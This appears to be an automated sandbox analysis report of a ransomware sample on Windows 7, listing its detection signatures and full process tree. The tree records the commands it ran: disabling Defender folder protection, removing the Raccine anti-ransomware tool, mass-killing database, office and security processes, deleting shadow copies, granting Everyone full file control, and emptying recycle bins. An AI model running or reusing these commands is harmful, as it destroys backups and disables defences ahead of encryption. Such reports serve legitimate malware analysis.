Analysis
-
max time kernel
154s -
max time network
63s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
28-05-2021 09:57
General
-
Target
48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
-
Size
353KB
-
MD5
3de060c1a25fb75735767e9450ed797d
-
SHA1
8c0e899fc89aa8e0201aa8ee4ba41cd05702116e
-
SHA256
48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698
-
SHA512
4792c3c919c87269544bbe60b62930059f71421eae0a736113e4472e14cfebf95b16ebc430e441a88655fcb84397d5959367061e59d58deaf26de43915eea37b
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 18 IoCs
Ransomware generally changes the extension on encrypted files.
-
Modifies file permissions 1 TTPs 64 IoCs
-
Windows security modification 2 TTPs 1 IoCs
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 58 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 62 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"1⤵
- Modifies extensions of user files
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\arp.exe"arp" -a2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ragent.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rmngr.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rphost.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM vmwp.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3092.bat2⤵
-
C:\Windows\system32\mountvol.exemountvol3⤵
-
C:\Windows\system32\find.exefind "}\"3⤵
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{de9ebae3-989d-11eb-b4e6-806e6f6e6963}\3⤵
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{de9ebae4-989d-11eb-b4e6-806e6f6e6963}\3⤵
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{de9ebae7-989d-11eb-b4e6-806e6f6e6963}\3⤵
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-2455352368-1077083310-2879168483-1000\d5019152-81c9-4e4b-b0f5-80b37542e450 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\ConnectCompare.mov /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2455352368-1077083310-2879168483-1000\0f5007522459c86e95ffcc62f32308f1_14c10c19-3a0b-4ef0-8928-af871cb14c00 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Videos\Sample Videos\Wildlife.wmv /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Desert.jpg /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Koala.jpg /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Music\Sample Music\Kalimba.mp3 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Music\Sample Music\Sleep Away.mp3 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft Help\nslist.hxl /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-07132009-221054.log /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasbase.vdm /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasdlta.vdm /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_15ac16619585aa27282df5e4c6acd0916524a313_cab_07747e05\DMI7DF5.tmp.log.xml /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000014.db /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6F95B335-B27B-43AB-99B0-FE819F4F3284}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{73B1DD16-5F6E-4703-817D-F411AA517EC7}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{A9642826-38E6-4A6F-A253-1839AB5002E3}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.chk /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00001.jrs /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00002.jrs /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.001 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.002 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.000 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.001 /grant Everyone:F /T /C /Q2⤵
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.002 /grant Everyone:F /T /C /Q2⤵
-
